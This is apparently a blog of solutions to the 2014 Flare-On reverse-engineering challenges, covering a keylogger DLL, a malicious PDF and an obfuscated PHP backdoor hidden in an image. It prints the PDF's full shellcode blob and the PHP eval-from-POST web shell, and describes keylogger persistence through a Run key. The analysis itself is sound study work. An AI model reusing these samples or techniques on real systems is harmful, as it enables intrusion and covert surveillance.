Sunday, November 30, 2014

Fireeye - Flare-on Challenge 5

This one was a DLL. Ooh another nice one. Most of my previous reversing success has either been PE or ELF so it's really cool to do all these cool challenges and improve.

A DLL is a library of functions that an EXE calls; it isn't a standalone program, so you can't run it directly...you need an EXE that loads it and then debug that EXE. At least that's how I've done it in the past :).

So I tried doing this with Olly 1.10, which comes with LoadDLL.exe. That failed and Olly got stuck. So I abandoned that idea and decided to use regsvr32 and rundll32 instead. What eventually worked was rundll32. So you load Olly up..open rundll32.exe and set Olly's arguments to the DLL and the export to call (5get_it.dll,DllMain).

http://www.iacertification.org/reverse_engineering_malware_971.html
http://www.openrce.org/forums/posts/313

Also make sure you're using Olly 2.01 and have set it to break each time a new DLL is loaded. I had a small blog post on this here.

So eventually...I broke in at DllMain...and with the help of IDA and some F8 in Olly it was clear that svchost.dll in the system32 directory was being overwritten. A registry key was also created in HKLM\....\Run... to ensure the DLL was run each time the machine rebooted. That much was relatively easy.

Now after all this...the code seemed to jump into one of the largest functions (at 10009EB0) I have ever seen. It seemed like a massive massive switch/case loop. Here's a pic..that shows how big it truly was:

[screenshot: the switch/case function at 10009EB0]
There was an API called GetAsyncKeyState...that was called and then it went into the switch-case structure. Here's a screenshot showing the code inside a couple of these functions. Take a guess what it is?

[screenshot: the code inside the 'v' and 'w' handler functions]

See the 'v' and 'w' in the screenshot? That's basically what's pushed to the function at 10001000, which then appends the character 'v' or 'w' to the svchost.log file in System32. Each little function does the same thing...just for a different character each time. In other words...this is a keylogger :)

Now I've been duped many times in the past following code down dead ends so I decided to write a little IDA script renaming all functions of this type..so I could ignore all of them and understand the rest of the program.

That code is here:- https://gist.github.com/arvinddoraiswamy/a16749ee76941e8d86c8

That made my life much easier...because most of the code got renamed and there was very little left to look at :). The bad part was... none of the other code seemed to have anything relevant to the flag at all. :(

Okay, let's run it in Olly...maybe something will turn up. Nope. It just remains in an endless loop...and logs every single keystroke to svchost.log. Now what?

Okay... let's now start opening up each of those functions...nothing super interesting until we come to 'm' and toggle the Zero flag....there's something different there. It makes a call to 10001240... something that none of the other letters do. Running this function causes a small message box with some ASCII art (FLARE) to pop up.

Well awesome. That's progress. But now what? The box doesn't have the flag in it, does it? But since the box pops up...it must mean something. What? Okay.. so when does the box pop up? When I hit 'm' and the variable at 100194fc is not <=0 . Hmm.

I know how to hit 'm'... but how do I force 100194fc to 1... or at least not <=0... so the correct branch is taken? If I can answer that...I have the flag. So we now want to search for references to 100194fc. Let's search in the IDB. Click Search - Sequence of Bytes and enter fc 94 01 10 (little endian). The only reference that's useful is an instruction...

.text:10009BF7 keylog_charbychar_10009B60 mov     dword_100194FC, 1

This means...that somewhere...some single location...it is setting 100194FC to 1. This is inside the function starting at 10009B60. What letter does that map to?

Ah...it maps to "o"... so stepping back...if we enter "o" it will set 100194fc to 1 ..and then if we press 'm' the ASCII art will pop up. Nice :).

So in other words we have to go backwards...study the values of every variable..see where it gets set to 1 and find out the next letter.

The bytes of the mov instruction to search for are given below. The byte in square brackets changes for each letter (it is the low byte of the variable's address).
c7 05 [fc] 94 01 10 01 00 00 00

For "o" we need to find where 100194ec is set to 1. That is inside "c". So the last 3 letters are "com". We're very close :)
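The backward walk above as a script, added for this write-up and not the post's own IDA script: it scans a code blob for the C7 05 <addr> 01 00 00 00 pattern, maps each hit to the handler that contains it, and follows the flag chain from 'm' back. The 'o' handler start (10009B60), the write at 10009BF7 and the two flag addresses are from the post; the handler ranges, the 'c' handler and the NOP-padded code bytes are constructed.

```python
import re
import struct

# Encoding the post searches for: mov dword ptr [imm32], 1
#   C7 05 <imm32 little-endian> 01 00 00 00
MOV_DWORD_ONE = re.compile(rb"\xc7\x05(.{4})\x01\x00\x00\x00", re.DOTALL)


def find_flag_writes(code, base):
    """Return {flag_address: instruction_address} for each 'mov dword [addr], 1' in code."""
    writes = {}
    for m in MOV_DWORD_ONE.finditer(code):
        flag_addr = struct.unpack("<I", m.group(1))[0]
        writes[flag_addr] = base + m.start()
    return writes


def letter_for(addr, handlers):
    """Map an instruction address to the letter whose handler range contains it."""
    for start, end, letter in handlers:
        if start <= addr < end:
            return letter
    return None


def recover_chain(code, base, handlers, checks, last_letter):
    """Walk the chain backwards from the final letter.

    checks maps a letter to the flag its handler tests (the cmp before the
    'good' branch). The handler that writes 1 to that flag belongs to the
    letter typed just before it; repeat until a handler tests no flag or
    the chain loops."""
    writes = find_flag_writes(code, base)
    chain, seen, letter = last_letter, {last_letter}, last_letter
    while letter in checks:
        setter = writes.get(checks[letter])
        prev = letter_for(setter, handlers) if setter is not None else None
        if prev is None or prev in seen:
            break
        chain = prev + chain
        seen.add(prev)
        letter = prev
    return chain


def mov_dword_one(flag_addr):
    """Assemble 'mov dword ptr [flag_addr], 1' (10 bytes)."""
    return b"\xc7\x05" + struct.pack("<I", flag_addr) + b"\x01\x00\x00\x00"


# Constructed stand-in for three handlers: NOP padding plus the one mov that
# matters. The 'o' start, the write at 10009BF7 and both flag addresses come
# from the post; the 'c' handler and all range sizes are made up for the sample.
BASE = 0x10009B00
CODE = (
    mov_dword_one(0x100194EC) + b"\x90" * (0x60 - 10)              # 'c' sets the flag 'o' tests
    + b"\x90" * 0x97 + mov_dword_one(0x100194FC) + b"\x90" * 0x0F  # 'o' writes 100194FC at 10009BF7
    + b"\x90" * 0x30                                               # 'm' only tests its flag
)
HANDLERS = [
    (0x10009B00, 0x10009B60, "c"),
    (0x10009B60, 0x10009C10, "o"),
    (0x10009C10, 0x10009C40, "m"),
]
CHECKS = {"m": 0x100194FC, "o": 0x100194EC}   # flags the 'm' and 'o' handlers compare against 0

if __name__ == "__main__":
    for flag, at in sorted(find_flag_writes(CODE, BASE).items()):
        print(f"{at:08X}: mov dword [{flag:08X}], 1  (handler '{letter_for(at, HANDLERS)}')")
    print("recovered suffix:", recover_chain(CODE, BASE, HANDLERS, CHECKS, "m"))
```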

Keep going this way... and eventually you end up with the flag that is:

l0ggingdoturdot5tr0ke5atflaredashondotcom

Fireeye - Flare-On Challenge 4

This one was a malicious PDF. Ooh nice. I'd never done one of those before and get to learn something new now. So for starters I read a great paper by Didier Stevens to understand how to go about analyzing PDFs.

http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book/

As it turns out, objects can be hidden (I knew this) inside PDFs. This includes Javascript and shellcode (knew this too). What I didn't know though is how to go about extracting these malicious objects. So after following the PDF paper, I learnt how to use the tools pdfid and pdfparser. Both these are available here.

http://blog.didierstevens.com/programs/pdf-tools/

Anyway I started off looking for strings inside the PDF using a simple hex editor. Nothing interesting found. Then I ran pdfid to get some information about the file...and whether there were any suspicious objects inside it.

python pdfid.py C:\Users\arvind\Desktop\Fireeye_Flareon\C4\APT9001.pdf

Object 6 in the output appeared to have some malicious content hidden inside it. So obviously, the next logical step is to extract these malicious objects.

python pdf-parser.py --object 6 --filter --raw C:\Users\arvind\Desktop\Fireeye_Flareon\C4\APT9001.pdf

This resulted in a large amount of heavily obfuscated JS being revealed. Here is a sample - notice the long random variable names - this is just classic obfuscation ("security by obscurity")...in an attempt to throw the reverser off.

var HdPN = "";
    var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
    var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7
e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%
u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb8
5%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u0
57b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%
ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f9
1%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub
727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%
u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb
8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue
3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%
u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc93
3%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u6
94c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%
u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u846
8%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u8
3f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
    var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";

    for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
    ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
    OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
    fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;


.....

The first thing I did was do a lot of "Find-Replace" on all these variables and make them human readable. After a little bit of manual tracing...it was clear that there was this large "unescape" blob..right at the top which was doing something.

I added a few document.write() and alert() calls to print out the variable values. This was a disaster and obviously the flag isn't a JS variable value. It's Unicode for sure...because of the %u at the start. But then it maps to Hangul characters :). Googling the name of the PDF document revealed that this was some advanced APT malware...so I was upset that I'd now have to learn Hangul to crack this. Nothing wrong of course with that...but not er..what I wanted to spend my time learning right now :)

This turned out to be a dead end though. I mean...okay, it's Hangul, but what now? :(. So I went back to basics...and started looking for other tools in that space. There was a new tool called peepdf that I tried to install...but after 2 hours of fighting to get libemu and pylibemu installed...I gave up out of sheer boredom and started looking at the JS again.

If it isn't Hangul or some wacky Unicode...it means something else. What? So I RTFM more and found an awesome link that explains more:

http://www.thegreycorner.com/2010/01/analysing-malicious-pdf-document.html

So...it's shellcode :). That's why it did NOT render as ASCII when I was trying to print it out. Ok now...I followed the instructions in that link, used that cool little script, edited it a bit to remove the "Help" code as it did not compile...converted the shellcode to C...and then compiled the C code to an EXE using wine and mingw - http://www.jonshouse.co.uk/linuxmingw.cgi
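An added helper (not the post's code nor the linked script) that turns a JS unescape() blob into the bytes it occupies in memory, which is the conversion step before the shellcode can be disassembled; it also shows why printing the string looked like Hangul, and that the sled loop runs 129 times, not 128. The sled unit and the first four code units are copied from the JS above; the rest of the blob is not repeated.

```python
import re

# Tokens JavaScript's unescape() understands: %uXXXX is one UTF-16 code unit, %XX one byte.
TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def unescape_to_bytes(s):
    """Convert an unescape() string to the bytes it occupies in memory.

    A %uXXXX unit is a 16-bit value stored little-endian, so %u72f9 becomes the
    byte sequence f9 72. Anything that is not an escape raises instead of being
    passed through silently, so a mangled blob is noticed."""
    out = bytearray()
    pos = 0
    for m in TOKEN.finditer(s):
        if m.start() != pos:
            raise ValueError(f"literal text at offset {pos}: {s[pos:m.start()]!r}")
        if m.group(1) is not None:
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    if pos != len(s):
        raise ValueError(f"literal text at offset {pos}: {s[pos:]!r}")
    return bytes(out)


def hangul_units(s):
    """Count %uXXXX units inside the Hangul Syllables block (U+AC00..U+D7A3).

    Code units in that range are why printing the variable looked like Korean."""
    return sum(1 for m in TOKEN.finditer(s)
               if m.group(1) is not None and 0xAC00 <= int(m.group(1), 16) <= 0xD7A3)


def build_sled(unit, first=128, last=0):
    """Replicate the JS loop 'for (i=first; i>=last; --i) sled += unescape(unit)'.

    Counting 128 down to 0 inclusive gives 129 copies, not 128."""
    return unescape_to_bytes(unit) * (first - last + 1)


# Values taken from the JavaScript in the post: the sled unit and the first four
# code units of the payload blob (the full blob is deliberately not repeated).
SLED_UNIT = "%ub32f%u3791"
PAYLOAD_HEAD = "%u72f9%u4649%u1525%u7f0d"

if __name__ == "__main__":
    sled = build_sled(SLED_UNIT)
    print("sled bytes:", sled[:8].hex(), "... length", len(sled))
    print("payload starts:", unescape_to_bytes(PAYLOAD_HEAD).hex())
    print("Hangul-looking units in the sled unit:", hangul_units(SLED_UNIT))
```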

Nice. Now I have shellcode that I need to debug as usual. Load it in IDA. Get the entry point. Set a BP in Olly on the entry point. OllyDbg time :). All the useful code eventually runs from 402000.

A little F8 and you can see all those instructions magically appear. Hangul indeed. Bah :). Set a breakpoint on 4023C1. You can see the email address in EAX :).

This email address is then XORed repeatedly with the word BEEF and the result is displayed in a message box. So really...if we'd just known that at the start and brute-force XORed with all 4-character strings.. we'd have saved ourselves a ton of trouble :)

The Email address is: wa1ch.d3m.spl01ts@flare-on.com

Fireeye - Flare-On Challenge 3

Number 3 was another EXE file. Apart from CFF Explorer, I also load these EXEs into PEiD, RDG Packer Detector and Protection ID... just to get a feel for how hard it's going to be. These tools are great...but again they only compare against a signature database... so they will miss stuff too. Anyway this time...nothing was detected, all clear.

You can reverse stuff statically...in IDA, or you can run it in a debugger like OllyDbg. I always prefer running things... it's much quicker. And then use IDA side by side to understand the flow of code..so I can set breakpoints in the right places. Always make sure though...that you run all this stuff inside a virtual machine :D and turn outbound connections off unless you're absolutely sure of what you're doing.

So anyway I loaded this up in OllyDbg and ran it...and it crashed with an error message. Time to step in (F7). The program exits inside 401000. Something inside this is responsible.

401000 copies a lot of code into memory. Nothing looks like ASCII. The start address (18FD47) of this "encrypted" block is then called. This means that an entire function was moved into memory at run-time and then called. Code between 18FD57 and 18FD61 XORs memory with 0x66 ('f') and obtains an ASCII string in memory: "and so it begins".

So already this points to...the flag eventually being in memory. The start of another encrypted block is at 18FD78. The word "nopasaurus" is compared for some reason :) and some more math results in "get ready to get no'ped..."

Slowly going through all code gives the 3rd flag ... in one of the registers (EAX I think).

The Email address is: such.5h311010101@flare-on.com

Trying to run further causes a crash at 18FF47. That's why you have to step into (F7) and not just run (F9) :).

It's easier to just find out where the crash happened and set a break point just before that... but I just did this slowly to show how to debug things manually.

Fireeye - Flare-On Challenge 2

The start for Challenge 2 was delayed by a few minutes due to me not reading instructions properly. The password for all the Zip files was "malware" but I didn't see this ... and wasted some time trying to crack the passwords #-o. Then I saw that all the challenges were Zip files and password protected...so it made no sense that I had to crack all of them. Some RTFM ... and I felt very stupid. Oh well :)

Unzipping reveals that there is an HTML file and an images directory. Loading up the file in a browser does nothing...and it looks very very similar to the Flare home page. Ditto for the image. It looks very similar to what's on the website. But obviously..that's not the case..right?

The next logical step would be to take MD5 hashes of the HTML file and the PNG file. Then download the ones from the website and hash those as well. If they're the same..the hashes will match. But sometimes...a hex editor like HxD on Ubuntu or CFF Explorer's inbuilt hex editor will do as well :) if you're lucky. This is one of those times.

Scrolling through the HTML source of the page...horizontally and vertically ;)... reveals a PHP directive which effectively includes a file..the image file..flare-on.png. Why?

Well...the include directive in PHP means that the code inside the included file runs at that point..before any following code is run. So if I say...

include a.png

and a.png has some PHP inside... and I have PHP installed correctly the browser might (I am not sure here) detect the PHP inside... and run it.

So I opened the image file inside a Hex editor and extracted all the Obfuscated PHP and pasted it to a text file. Copied all of that into a PHP file.


<?php
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r",
 "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5",
 "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");

$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43,
87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28
, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91
, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63,
 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88,
77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37,
91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70
, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49,
 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63
, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11,
 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75,
77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37,
70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);

$do_me="";
// loop condition reconstructed; the original was lost when the page was extracted
for($i=0;$i<count($order);$i++){
    $do_me=$do_me.$terms[$order[$i]];
}

print_r("$do_me");
eval($do_me);
?>


I added a few print statements to it... and printed its content to the screen. This was the result.

$_= \'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';

$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';

$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";

eval($___($__));

Decoding the escapes in $___ gives base64_decode, so the last line is really eval(base64_decode($__)). Base64 decoding $__ gives:

$code=base64_decode($_);
eval($code);

So we have to now decode $_ .. sigh...this is what we now get.

'if(isset($_POST["\\97\\49\\49\\68\\x4F\\84\\116\\x68\\97\\x74\\x44\\x4F\\x54\\x6A\\97\\x76\\x61\\x35\\x63\\x72\\97\\x70\\x41\\84\\x66\\x6C\\97\\x72\\x65\\x44\\65\\x53\\72\\111\\110\\68\\79\\84\\99\\x6F\\x6D"]))

{
     eval(base64_decode($_POST["\\97\\49\\x31\\68\\x4F\\x54\\116\\104\\x61\\116\\x44\\79\\x54\\106\\97\\118\\97\\53\\x63\\114\\x61\\x70\\65\\84\\102\\x6C\\x61\\114\\101\\x44\\65\\x53\\72\\111\\x6E\\x44\\x4F\\84\\99\\x6F\\x6D"]) );
}'

That's just a funny mix of hex (\x..) and decimal ASCII codes. If it'd been any bigger than this I'd have thought of writing a script - but since it wasn't huge...at under 3 lines... the manual lookup method was quicker for sure.

This is what I eventually get - a11DOTthatDOTjava5crapATflareDASHonDOTcom

and replacing DOT, AT and DASH we get the 2nd Email address.
a11.that.java5crap@flare-on.com
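The peeling done by hand above, as an added script (not the challenge's PHP): it resolves PHP's own \xHH and octal escapes in $___, base64-decodes $__, and decodes the $_POST key with the decimal reading the post uses (PHP itself would not treat \97 as an escape, which is the caveat). The values are copied from the page; the big $_ blob is decoded the same way as $__ and is left out here.

```python
import base64
import re

# Escapes PHP honours inside a double-quoted string: \xHH (hex) and \ooo (octal, 1-3 digits).
PHP_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")
# The $_POST key on the page mixes \xHH with *decimal* codes (\97 is 'a'). PHP would leave
# \97 as literal text, so this second pattern decodes it the way the post does, by hand.
# One or two backslashes are accepted because the page shows the key with both.
MIXED_ESCAPE = re.compile(r"\\\\?x([0-9A-Fa-f]{2})|\\\\?([0-9]{2,3})")


def decode_php_string(s):
    """Resolve a PHP double-quoted string's hex and octal escapes (PHP semantics)."""
    return PHP_ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8)), s)


def decode_mixed_escapes(s):
    """Resolve the hex-or-decimal escapes used in the $_POST key (the post's reading)."""
    return MIXED_ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 10)), s)


def unwrap_flag(s):
    """Turn the spelled-out address (DOT/AT/DASH) into an e-mail address."""
    return s.replace("DASH", "-").replace("DOT", ".").replace("AT", "@")


# Layer values copied from the page ($_ is omitted; it is base64 like $__).
DOLLAR_3 = r"\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
DOLLAR_2 = "JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7"
POST_KEY = (r"\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114"
            r"\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D")


def peel():
    """Return (function name in $___, code in $__, $_POST key, e-mail address)."""
    func = decode_php_string(DOLLAR_3)              # name of the function eval() calls
    stage2 = base64.b64decode(DOLLAR_2).decode()    # what eval($___($__)) runs
    key = decode_mixed_escapes(POST_KEY)            # the $_POST parameter name
    return func, stage2, key, unwrap_flag(key)


if __name__ == "__main__":
    for label, value in zip(("$___", "$__ decoded", "POST key", "e-mail"), peel()):
        print(f"{label:12s} {value}")
```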

Fireeye - Flare-On Challenge 1

I've been playing the Flare On challenge recently and got through a few levels. It's good fun and I learnt a few things. I'll write a few short blog posts on the concepts/tools/solutions of each of these challenges as and when I solve them. Here's number 1.

Number 1 is an EXE file. The first thing I always do for any Windows file is open it up in CFF Explorer. The metadata of the file talks about something called Wextract. Wextract is the name of the program in Windows that creates self-extracting compressed files. So maybe... it's a Zip file...or some other compressed file?

Renamed the file to C1.rar (since I had WinRAR on the system) and tried to extract the file. That worked and I got a new EXE file. Throw the new file into CFF Explorer.. it's a .NET executable.

The moment I see .NET .. I'm happy... because all .NET binaries can be decompiled and the actual source code retrieved. There are many such decompilers around.. I usually use dotPeek or ILSpy - both should be fine for such challenges. Decompiling everything shows that all of the code is in a file called Form1.cs.

On launching the binary and clicking the button shown... the picture changes and some encrypted text is shown on screen. That means that there is some code on the "Click" event that is doing something. Looking at the code shows that this is indeed the case.

There is a decode function that is triggered when a button is clicked. This basically pulls some string from the "Resources" of the program and runs the algorithm on that string. The result of that "decoding" is the junk that you see on screen.

Now .. there's nothing else in the code. At this point you know what the code is doing. So where's the flag? Well...think. You found code which encrypts A and gives you B. Neither A nor B is useful. But we need some plain text email address... that is the final flag. This means that..we need to look for other encrypted strings to run this algorithm on.

Searching more using CFF Explorer reveals a resource called dat_secret.encode. Use the inbuilt hex editor in CFF Explorer to identify the hex bytes that are to be decoded. This is the input that needs to be passed to the decoding function.

So I pull the code from Form1.cs out and load it into an online compiler at http://ideone.com/. I'm not too good at all at .NET so it takes me a while to compile the code :)..but eventually I manage to decode the string. I print out str1, str2, str3 and str4 to see what goes into each of those variables...using the Console.Write method.

The Email address is: 3rmahg3rd.b0b.d0ge@flare-on.com

